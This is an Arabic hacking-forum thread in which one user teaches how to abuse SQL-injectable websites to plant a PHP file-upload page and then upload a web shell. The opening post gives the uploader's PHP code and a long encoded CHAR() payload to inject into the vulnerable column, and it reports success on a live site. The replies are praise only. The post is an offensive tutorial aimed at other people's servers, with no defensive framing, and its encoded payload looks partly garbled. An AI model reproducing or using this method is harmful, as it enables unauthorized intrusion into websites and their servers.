حالة الموضوع:
مغلق
  1. r3xb0t3r

    r3xb0t3r Developer

    الأنتساب:
    ‏2 ديسمبر 2011
    المشاركات:
    5
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    السلام عليكم ورحمة الله وبركاته ...

    طبعا بدون مقدمات وكاتب الموضوع على عجلة ...

    قبل فترة اكثر من شهر خطرت ببالي فكرة ...

    هي شلون نعمل مركز رفع من الخلال المواقع المصابة بـ SQL

    الطريقة كالتالي ...

    ناخذ سكربت مركز الرفع وهذا الكود بتاعه ...

    كود PHP:
     <?php 
    echo '<b>Upload Center</b>';
    echo 
    '<b><br><br>'.php_uname().'<br></b>';
    echo 
    '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo 
    '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if( 
    $_POST['_upl'] == "Upload" ){ if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done !!!</b><br><br>'; }
     else { echo 
    '<b>!!!!!!!Upload Failed!!!!!! </b><br><br>'; }}?>  
    ونروح على ادادة Hack Bar الموجودة بالفايرفوكس ونختار

    SQL > MySQL > MySQLCHAR

    راح يظهر مستطيل صغير تخليه بيه اكواد مركز الرفع الي فوق وتضغك ok راح تحصل هذه التشفيرة

    كود PHP:
    CHAR(677265824054484432545144324949504432494852443249495044325150443251504432494849443257574432494852443249494944325150443251574432544844325756443254504432565344324949504432494856443249494944325755443249484844325150443254554432494849443249494844324949544432494849443249495244325448443252554432575644325450443251574432535744325150443249484944325757443249485244324949494432515044325157443254484432575644325450443254484432575644324949524432545044325448443257564432494952443254504432515744325254443249495044324948524432494950443257534432494955443249494844325755443249485744324948494432524844325249443252544432515744325448443257564432494952443254504432544844325255443257564432545044325157443253574432515044324948494432575744324948524432494949443251504432515744325448443249485044324949494432494952443249485744325150443257554432575744324949544432494853443249494944324949484432544944325152443251524432515044324948574432494849443249495444324948524432494949443249484844325449443251524432494950443249494944324949534432494954443251524432515044324948494432494948443257574432494954443249504944324949504432494849443254494432515244324948574432494955443249485644324949544432494853443249495044325755443249495244324949544432525544324948504432494949443249495244324948574432525344324948484432575544324949544432575544325152443251504432494948443257554432494857443249484944325449443251524432494955443249495044324948564432494949443257554432494848443249484944324949524432515244325150443249485344324948484432544944325152443249495544324949504432494856443249494944325755443249484844324948494432494952443251524432545044325157443253574432515044324948494432575744324948524432494949443251504432515744325448443249485344324949484432494950443249495544324949544432515044324949544432495049443249495044324948494432544944325152443249485044324948534432494856443249484944325152443251504432494948443257554432494857443249484944325449443251524432494850443249485344324948564432494849443251524432515044324949534432494853443249505044324948494432544944325152443253514432525644325152443254504432544844324948534432494948443249495044324949554432494954443251504432494948443257554432494857443249484944325449443251524432575344324949554432494950443249485644325152443251504432494954443249504944324949504432494849443254494432515244324949534432494955443257564432494857443249485344324949544432515244325150443249485344324948484432544944325152443257534432494955443249495044324948564432515244325150443249495644325755443249485644324949554432494849443254494432515244325653443249495044324948564432494949443257554432494848443251524432545044325448443252554432494850443249494944324949524432494857443254504432515744325357443251504432494853443249485044325248443251504432515444325753443256484432555744325651443256524432574944325157443257534432494955443249495044324948564432515744325751443251504432544944325449443251504432515244325653443249495044324948564432494949443257554432494848443251524432515044325249443249505144325150443249485344324948504432524844325452443257574432494949443249495044324950494432524844325154443257534432554844325551443255544432545744325651443257494432515744324948504432494853443249485644324948494432515744325751443257494432515744324949544432494857443249495044325753443249494844325755443249485744324948494432515744325751443252524432515044325154443257534432554844325551443255544432545744325651443257494432515744324948504432494853443249485644324948494432515744325751443257494432515744324949484432575544324948574432494849443251574432575144325249443252494432515044324950514432515044324948494432575744324948524432494949443251504432515744325448443257564432545044325456443249494944324949484432494849443251504432515144325151443251514432544844325255443257564432545044325448443257564432494952443254504432544844325756443249495244325450443251574432535744325150443249505344325150443251504432494849443249485644324949534432494849443251504432495051443251504432494849443257574432494852443249494944325150443251574432544844325756443254504432515144325151443251514432515144325151443251514432515144325653443249495044324948564432494949443257554432494848443251504432554844325755443249485344324948564432494849443249484844325151443251514432515144325151443251514432515144325150443254484432525544325756443254504432544844325756443249495244325450443254484432575644324949524432545044325157443253574432515044324950534432495053443254514432545041)
    بعدها تاخذها على طول للعمود المصاب وتخليه مكانه وتضغط انتر وان شاء الله تشوف مركز الرفع امامك

    ومن خلال المركز تكدر ترفع ملفاتك حتى الشل وتم التجربة وحمد لله انرفع لكن المشكلة بتحديد مساره

    طيب يجي واحد يسأل كيف عرفت انرفع ..؟ لو ما انرفع كان السكربت طبع لك upload faild ....

    واعتقد حل مشكلة المسار هي تنصيب سكربت مصاب على السيرفر الشخصي وتطبيق الفكرة ونشوف الشل وين ..

    همسة : نزلت هذا الشرح بسبب بعض الناس الي علمتهم هذه الطريقة على الخاص وقامو بنشروها وطلعو هم المكتشفين واصحاب الخبرة [​IMG]


    اضافة للموضوع ... صورة للتطبيق على الموضوع

    [​IMG]

    موفقين ^:"
     
    1 person likes this.
  2. zorax

    zorax Developer

    الأنتساب:
    ‏5 سبتمبر 2011
    المشاركات:
    29
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    كل الشكر والتحيه والتقدير
    مجهود اكثر من رائع
    سلمت يداك
    )5:")5:"
     
  3. sly hkr

    sly hkr Developer

    الأنتساب:
    ‏7 ديسمبر 2011
    المشاركات:
    16
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    ???
    الإقامة:
    FrOm Qatar
    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    رائع حبيبى مشكور على هدا المجهود%:"​
     
  4. NaZy

    NaZy Developer

    الأنتساب:
    ‏4 ديسمبر 2011
    المشاركات:
    19
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    فـي سـسـتم!
    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    الله يعطيك العافيه
    شرح رائع وسهل
    الله يوفقك
    )5:"
     
  5. HaCkER-EgYpT

    HaCkER-EgYpT Developer

    الأنتساب:
    ‏9 ديسمبر 2011
    المشاركات:
    64
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    الإقامة:
    EgYpT
    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    شكرٍآَ آخـِىَُِ .. وآصَل موٍضوٍعَ متعوٍبَ فيـِهَ

    ^:"^:"^:"
     
  6. DJ_HacKeR

    DJ_HacKeR <b><font color="silver" size="4" face="Arial">ṤạĻỖ Developer

    الأنتساب:
    ‏9 ديسمبر 2011
    المشاركات:
    40
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    ::.طالب.::
    الإقامة:
    ::.مكه المكرمه.::
    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    وعليككُمَ آلسَلآمَ ورحمة آلله وبركآتهَ ،

    يعيطككَ آلعآفيهَ يَ آلغآليَ ،


    وآصلَ آبدآعكَ ،

     
  7. الحربي

    الحربي DeveloPer Plus

    الأنتساب:
    ‏9 ديسمبر 2011
    المشاركات:
    72
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    Ӄ Ŵ Ť
    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    مجهود رآئع يآبعدي !:"
    لاهنت ولك احلى ++
     
  8. احمد العراقي

    احمد العراقي ExpErt DeveloPer

    الأنتساب:
    ‏17 سبتمبر 2011
    المشاركات:
    164
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الإقامة:
    ~ IQ-T34M ~
    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    يعطيك الف عافية اخي

    وبارك الله فيك

    مبادرة طيبة تشكر عليها وجزاك الله عنها خير الجزاء&:"
     
  9. OuT-L4w

    OuT-L4w <b><font size="4"><font color="#FF0000">Ṩ</font><f Developer

    الأنتساب:
    ‏10 ديسمبر 2011
    المشاركات:
    62
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    KeyBoard
    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل

    الله يعافيك اخي .^:"
     
  10. MSOODN

    MSOODN ExpErt DeveloPer

    الأنتساب:
    ‏11 ديسمبر 2011
    المشاركات:
    53
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    kSa
    رد: استغلال ثغرات SQL Inj3ti0n في انشاء مركز رفع لرفع الشل


    سلام عليكم ورحمة الله وبركاته يا غالي
    والله موضوع رائع
    يعطيك العافية أخي الكريم^:"
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة